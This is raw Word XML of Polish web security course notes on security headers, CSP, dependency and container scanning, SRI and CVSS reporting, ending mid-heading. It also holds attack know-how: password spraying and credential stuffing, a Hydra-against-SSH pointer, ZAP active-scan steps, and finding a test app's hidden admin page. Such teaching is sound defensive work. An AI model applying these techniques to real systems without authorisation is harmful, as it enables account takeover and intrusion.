          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="562EDED5" wp14:editId="5F278105">
            <wp:extent cx="4206605" cy="967824"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="61" name="Obraz 6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C8E" w14:textId="3E2205E4" w:rsidR="00D40B5E" w:rsidRDefault="00D40B5E" w:rsidP="00160062">
      <w:r>
        <w:t>Jak aplikacja to jedynie API bez frontu dla użytkowników to nie ma potrzeby HSTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2127A6" w14:textId="08A9DFE1" w:rsidR="00160062" w:rsidRDefault="00530032" w:rsidP="00160062">
      <w:r>
        <w:t xml:space="preserve">307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– jak zostało wysłane zapytanie i otrzymaliśmy od serwera odpowiedź z HSTS to przeglądarka zapamięta, że miało być po </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>https</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77FE6478" w14:textId="4822D026" w:rsidR="00C44BF4" w:rsidRDefault="00C44BF4" w:rsidP="00160062">
      <w:r>
        <w:t>X-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Frame</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Options</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E6C9BD2" w14:textId="5135B672" w:rsidR="00160062" w:rsidRDefault="00B32830" w:rsidP="00160062">
      <w:r w:rsidRPr="00B32830">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14A501B8" wp14:editId="193F9C34">
            <wp:extent cx="4206605" cy="1044030"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810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99C7" w14:textId="7DE3E9C0" w:rsidR="00160062" w:rsidRDefault="00160062" w:rsidP="00160062"/>
    <w:p w14:paraId="2B8B6363" w14:textId="77777777" w:rsidR="004276E5" w:rsidRDefault="004276E5" w:rsidP="00160062"/>
    <w:p w14:paraId="7A6846D1" w14:textId="5672074E" w:rsidR="00160062" w:rsidRDefault="00160062" w:rsidP="00160062">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r w:rsidRPr="00160062">
        <w:t>Lekcja 9: Content-Security-Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8F121A" w14:textId="1C6E0900" w:rsidR="007811CF" w:rsidRDefault="007811CF" w:rsidP="007811CF">
      <w:r>
        <w:t>Każda strona posiadająca użytkowników powinna mieć wdrożone CSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445C104E" w14:textId="0391FF74" w:rsidR="007811CF" w:rsidRDefault="00000000" w:rsidP="007811CF">
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidR="007163E3" w:rsidRPr="00FD714A">
          <w:rPr>
            <w:rStyle w:val="Hipercze"/>
          </w:rPr>
          <w:t>https://csp-evaluator.withgoogle.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007163E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1301BB2B" w14:textId="516855AB" w:rsidR="007163E3" w:rsidRDefault="00000000" w:rsidP="007811CF">
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidR="007163E3" w:rsidRPr="00FD714A">
          <w:rPr>
            <w:rStyle w:val="Hipercze"/>
          </w:rPr>
          <w:t>https://github.com/google/csp-evaluator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007163E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D65D39" w14:textId="49CA9631" w:rsidR="00D86506" w:rsidRPr="00D86506" w:rsidRDefault="007163E3" w:rsidP="00D379C5">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:t>Moduł 9 Podatności w komponentach zewnętrznych</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD18A13" w14:textId="07C33066" w:rsidR="007163E3" w:rsidRDefault="007163E3" w:rsidP="00D86506">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r w:rsidRPr="007163E3">
        <w:t>Lekcja 3: Demonstracja podatności w aplikacji testowej</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6624609D" w14:textId="4B5535BC" w:rsidR="00D86506" w:rsidRDefault="00F57C2B" w:rsidP="007163E3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1EFB41D1" w14:textId="074ED72F" w:rsidR="007C6812" w:rsidRDefault="007C6812" w:rsidP="007163E3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> i –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>package</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-lock-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>only</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76A1E8E8" w14:textId="051E97C4" w:rsidR="003712C3" w:rsidRDefault="003712C3" w:rsidP="007163E3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>audit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01B0E272" w14:textId="6F48E5EC" w:rsidR="00A47F78" w:rsidRDefault="00000000" w:rsidP="007163E3">
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidR="00A47F78" w:rsidRPr="00F9437E">
          <w:rPr>
            <w:rStyle w:val="Hipercze"/>
          </w:rPr>
          <w:t>https://retirejs.github.io/retire.js/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A47F78">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA97C6E" w14:textId="05A4D99D" w:rsidR="00A47F78" w:rsidRDefault="00000000" w:rsidP="007163E3">
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidR="00A47F78" w:rsidRPr="00F9437E">
          <w:rPr>
            <w:rStyle w:val="Hipercze"/>
          </w:rPr>
          <w:t>https://docs.npmjs.com/cli/v9/commands/npm-audit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A47F78">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AC20EC" w14:textId="1C9B63A5" w:rsidR="007163E3" w:rsidRDefault="007163E3" w:rsidP="00D86506">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r w:rsidRPr="007163E3">
        <w:t>Lekcja 4: Omówienie dodatkowych przypadków</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104A670B" w14:textId="1385D324" w:rsidR="00D86506" w:rsidRDefault="00EF0BD6" w:rsidP="007163E3">
      <w:r>
        <w:t xml:space="preserve">Skan obrazu kontenerowego : </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidRPr="00AB21C6">
          <w:rPr>
            <w:rStyle w:val="Hipercze"/>
          </w:rPr>
          <w:t>https://github.com/aquasecurity/trivy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00736B5E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00736B5E">
        <w:t>Trivy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00736B5E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64052C34" w14:textId="3EB518C7" w:rsidR="00D86506" w:rsidRDefault="00775FD2" w:rsidP="007163E3">
      <w:r w:rsidRPr="001C0214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06CEA464" wp14:editId="40854620">
            <wp:extent cx="4505325" cy="2212270"/>
            <wp:effectExtent l="0" t="0" r="0" b="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8865" cy="22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896C" w14:textId="2CC11825" w:rsidR="00D523AD" w:rsidRDefault="00D523AD" w:rsidP="00D379C5">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:t>Moduł 10: Uwierzytelnianie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C10B4C" w14:textId="08ABD1E6" w:rsidR="00D523AD" w:rsidRDefault="00D523AD" w:rsidP="00D523AD">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r w:rsidRPr="00D523AD">
        <w:t>Lekcja 3: Ataki automatyczne na mechanizm uwierzytelniania</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A019FB" w14:textId="06C815F1" w:rsidR="00D523AD" w:rsidRDefault="00AA2831" w:rsidP="00D523AD">
      <w:r w:rsidRPr="00AA2831">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44AFF2D8" wp14:editId="2D041E90">
            <wp:extent cx="5273497" cy="1425063"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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7181" w14:textId="3F6DDBFF" w:rsidR="00D379C5" w:rsidRDefault="00D379C5" w:rsidP="00D523AD">
      <w:r>
        <w:t xml:space="preserve">Przesyłanie gettem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007E3291">
        <w:t>tokenów</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007E3291">
        <w:t xml:space="preserve"> – może się odłożyć </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007E3291">
        <w:t>gdzies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007E3291">
        <w:t xml:space="preserve"> na sieci</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749DACF6" w14:textId="77777777" w:rsidR="00C41B57" w:rsidRDefault="00C41B57" w:rsidP="00D523AD"/>
    <w:p w14:paraId="2F9DCB4C" w14:textId="48BBA830" w:rsidR="00A32404" w:rsidRDefault="00A32404" w:rsidP="00D523AD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Podział według MITRE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62300231" w14:textId="1C0E431D" w:rsidR="00A32404" w:rsidRDefault="00A32404" w:rsidP="00D523AD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cracking – łamanie haszy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3173B8" w14:textId="203FC5A8" w:rsidR="00322D43" w:rsidRDefault="00322D43" w:rsidP="00D523AD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>guessing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001B6E47">
        <w:t xml:space="preserve"> – wszyscy użytkownicy i wszystkie możliwe hasła </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDC4A22" w14:textId="6DF72505" w:rsidR="00C41B57" w:rsidRDefault="00C41B57" w:rsidP="00D523AD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Spraying</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001B6E47">
        <w:t xml:space="preserve"> – top 100 używanych haseł dla wszystkich użytkowników</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA56A5" w14:textId="4D640F26" w:rsidR="00C41B57" w:rsidRDefault="00C41B57" w:rsidP="00D523AD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Credential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stuffing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001B6E47">
        <w:t xml:space="preserve"> – top ileś haseł znalezionych w wyciekach haseł dla użytkownika</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252AE44B" w14:textId="06631A65" w:rsidR="00EB64E8" w:rsidRDefault="00EB64E8" w:rsidP="001602CB">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Moduł 11 Problemy z integralnością aplikacji i danych </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E84BEC" w14:textId="5608A919" w:rsidR="00EB64E8" w:rsidRDefault="00EB64E8" w:rsidP="00BB2B6D">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB64E8">
        <w:t>Lekcja 3: Przykład ataku na łańcuch dostawczy via CDN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254C09D6" w14:textId="5E4A0C35" w:rsidR="00EB64E8" w:rsidRDefault="00EB64E8" w:rsidP="00D523AD">
      <w:r>
        <w:t xml:space="preserve">CTRL+SHIFT+R – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>przeladowanie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5EBC9" w14:textId="0E779BDA" w:rsidR="00EB64E8" w:rsidRDefault="00EB64E8" w:rsidP="00BB2B6D">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB64E8">
        <w:t xml:space="preserve">Lekcja 4: Na ratunek: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB64E8">
        <w:t>Subresource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB64E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB64E8">
        <w:t>Integrity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB64E8">
        <w:t xml:space="preserve"> (SRI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA2C31A" w14:textId="65D701D6" w:rsidR="00EB64E8" w:rsidRDefault="00C92EE1" w:rsidP="00D523AD">
      <w:r w:rsidRPr="00C92EE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77D1DB4D" wp14:editId="2C62D01F">
            <wp:extent cx="5760720" cy="1561465"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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103" w14:textId="381DA07D" w:rsidR="00C92EE1" w:rsidRDefault="00C92EE1" w:rsidP="00D523AD">
      <w:r w:rsidRPr="00C92EE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63A2B6D2" wp14:editId="424E7270">
            <wp:extent cx="5760720" cy="871220"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080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1F25" w14:textId="0E1BA0A8" w:rsidR="00C92EE1" w:rsidRDefault="001659F3" w:rsidP="001659F3">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:t>Moduł 12 Monitorowanie i logowanie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EF071A" w14:textId="43949D0E" w:rsidR="002477B1" w:rsidRDefault="002477B1" w:rsidP="002477B1">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Zap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> jako DAST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3759F87B" w14:textId="53F4403F" w:rsidR="002477B1" w:rsidRDefault="00A6790D" w:rsidP="002477B1">
      <w:r w:rsidRPr="00A6790D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5093B875" wp14:editId="28CBE100">
            <wp:extent cx="5760720" cy="261048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51B" w14:textId="3A77B55E" w:rsidR="00191DD6" w:rsidRDefault="00191DD6" w:rsidP="002477B1">
      <w:r>
        <w:t xml:space="preserve">2.Przeklikać </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zapa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, żeby sobie zmapował stronę</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D75B915" w14:textId="5AC3EF86" w:rsidR="00191DD6" w:rsidRDefault="00715B57" w:rsidP="002477B1">
      <w:r>
        <w:t xml:space="preserve">3.Uruchomić </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>spidering</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> na strony – żeby odkryć jeszcze więcej końcówek</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C8DAEC" w14:textId="6CBBF688" w:rsidR="00E25D23" w:rsidRDefault="00E25D23" w:rsidP="002477B1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.Active </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -&gt;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01EDB0DA" w14:textId="2BE87DD9" w:rsidR="00E25D23" w:rsidRDefault="00E25D23" w:rsidP="002477B1">
      <w:r>
        <w:t xml:space="preserve">5.Uzupełnij Technology, Input </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vectors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1130C93F" w14:textId="427A98DF" w:rsidR="00E25D23" w:rsidRDefault="00E25D23" w:rsidP="002477B1">
      <w:r>
        <w:t xml:space="preserve">6.Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74476A7E" w14:textId="3FE6FBAA" w:rsidR="007049B1" w:rsidRDefault="007049B1" w:rsidP="007049B1">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hydra do ataku na </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A3D3088" w14:textId="1B3AABD3" w:rsidR="007049B1" w:rsidRPr="007049B1" w:rsidRDefault="007049B1" w:rsidP="007049B1">
      <w:r w:rsidRPr="007049B1">
        <w:t>https://github.com/vanhauser-thc/thc-hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3E29C9" w14:textId="35E2D81D" w:rsidR="001659F3" w:rsidRDefault="00A30E50" w:rsidP="00AA3897">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:t>Moduł 13 Podatność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</w:p>
    <w:p w14:paraId="5A89B3D0" w14:textId="1823EB16" w:rsidR="00A30E50" w:rsidRDefault="00AA3897" w:rsidP="001659F3">
      <w:r w:rsidRPr="00AA3897">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DFE7EBE" wp14:editId="60A43F79">
            <wp:extent cx="5760720" cy="828040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="70" name="Obraz 7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 descr="Obraz zawierający tekst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493" w14:textId="39D9FD2F" w:rsidR="00AA3897" w:rsidRDefault="00FB56D6" w:rsidP="001659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B56D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="440637F3" wp14:editId="0FF2DB0B">
            <wp:extent cx="5760720" cy="272415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D2DB" w14:textId="4D24F246" w:rsidR="00F23B81" w:rsidRDefault="00F23B81" w:rsidP="00F23B81">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:t>Moduł 14 Raportowanie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6F464B" w14:textId="105EAFC0" w:rsidR="00F23B81" w:rsidRDefault="00F23B81" w:rsidP="00F23B81">
      <w:r>
        <w:t>CVSS- zakres od 1 do 10 z dokładnością do jednego miejsca po przecinku</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B89064F" w14:textId="16A725A6" w:rsidR="00F23B81" w:rsidRDefault="002871D3" w:rsidP="00F23B81">
      <w:r>
        <w:t>CVSS to ocena krytyczności</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255C20CE" w14:textId="2D6EEAFA" w:rsidR="0018404A" w:rsidRDefault="00000000" w:rsidP="00F23B81">
      <w:hyperlink r:id="rId57" w:history="1">
        <w:r w:rsidR="0018404A" w:rsidRPr="00DC0A32">
          <w:rPr>
            <w:rStyle w:val="Hipercze"/>
          </w:rPr>
          <w:t>https://www.first.org/cvss/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41EAB98B" w14:textId="2EBB083B" w:rsidR="0018404A" w:rsidRDefault="0018404A" w:rsidP="00F23B81">
      <w:r>
        <w:t>Jest jeszcze VRT, które jest dedykowane dla manualnych podatności w web aplikacjach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A88DA5" w14:textId="73F38DB3" w:rsidR="0018404A" w:rsidRDefault="00000000" w:rsidP="00F23B81">
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r w:rsidR="0018404A" w:rsidRPr="00DC0A32">
          <w:rPr>
            <w:rStyle w:val="Hipercze"/>
          </w:rPr>
          <w:t>https://bugcrowd.com/vulnerability-rating-taxonomy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C4F3511" w14:textId="109B09AB" w:rsidR="0018404A" w:rsidRDefault="00B06772" w:rsidP="00F23B81">
      <w:r>
        <w:t>(skala od 1 do 5, gdzie 5 to najmniejsza krytyczność)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CEA184" w14:textId="280FF7E1" w:rsidR="0056032A" w:rsidRDefault="0056032A" w:rsidP="00F23B81">
      <w:r>
        <w:t xml:space="preserve">CVE stworzone przez </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mitre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> na potrzeby publicznie znanych podatności</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A54730" w14:textId="69FA5CB8" w:rsidR="001A5EC3" w:rsidRDefault="001A5EC3" w:rsidP="00F23B81">
      <w:r>
        <w:t>CWE – również jest od MITRE ( CWE Top 25 ) – lista słabości w oprogramowaniu oraz sprzęcie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C3E69F" w14:textId="77777777" w:rsidR="00A17035" w:rsidRDefault="00A17035" w:rsidP="00F23B81"/>
    <w:p w14:paraId="5CA2A390" w14:textId="77777777" w:rsidR="0056032A" w:rsidRPr="00F23B81" w:rsidRDefault="0056032A" w:rsidP="00F23B81"/>
    <w:p w14:paraId="091B4863" w14:textId="4AD240CE" w:rsidR="00F23B81" w:rsidRDefault="00F23B81" w:rsidP="00F23B81">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1094"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005F4AB4" w:rsidRPr="005F4AB4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26857BDB" wp14:editId="7E461DBF">
            <wp:extent cx="5760720" cy="22307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F9F2" w14:textId="5BD01C3E" w:rsidR="00F424D8" w:rsidRDefault="00F424D8" w:rsidP="00F424D8">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:t>Dodatkowe znaleziska</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D8511C" w14:textId="5EE1F141" w:rsidR="00F424D8" w:rsidRDefault="00F424D8" w:rsidP="00F424D8">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Redirect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> na stronę </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>blockchainową</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CF14533" w14:textId="6F733715" w:rsidR="00F424D8" w:rsidRPr="00F424D8" w:rsidRDefault="00F424D8" w:rsidP="00F424D8">
      <w:r>
        <w:t>Wystarczyło wejść w Debugger i przejść do main.js i wyszukać w nim linki wyszukując po słowie kluczowym „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redirect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292371CD" w14:textId="10CEC1C5" w:rsidR="00F424D8" w:rsidRDefault="00F424D8" w:rsidP="00F424D8">
      <w:r w:rsidRPr="00F424D8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F9D7FE5" wp14:editId="4AC5E8B5">
            <wp:extent cx="5760720" cy="2352675"/>
            <wp:effectExtent l="0" t="0" r="0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6F5E" w14:textId="3FB218EC" w:rsidR="00E42C52" w:rsidRDefault="00E42C52" w:rsidP="00E42C52">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>Ukryta strona administracyjna</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E166944" w14:textId="2E72DAD2" w:rsidR="00004BA9" w:rsidRDefault="00A50187" w:rsidP="00F424D8">
      <w:r w:rsidRPr="00A50187">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="357DC24C" wp14:editId="17B3852A">
            <wp:extent cx="5760720" cy="18313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E7" w14:textId="6F695A12" w:rsidR="00E42C52" w:rsidRDefault="00E42C52" w:rsidP="00F424D8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> do „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>administration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” można znaleźć w kodzie strony.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C651812" w14:textId="7D594C8B" w:rsidR="00E42C52" w:rsidRDefault="00E42C52" w:rsidP="00F424D8"/>
    <w:p w14:paraId="65DA60D0" w14:textId="2B27227B" w:rsidR="00E42C52" w:rsidRDefault="00E42C52" w:rsidP="00E42C52">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Możliwość podegrania </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xml’a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pod </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
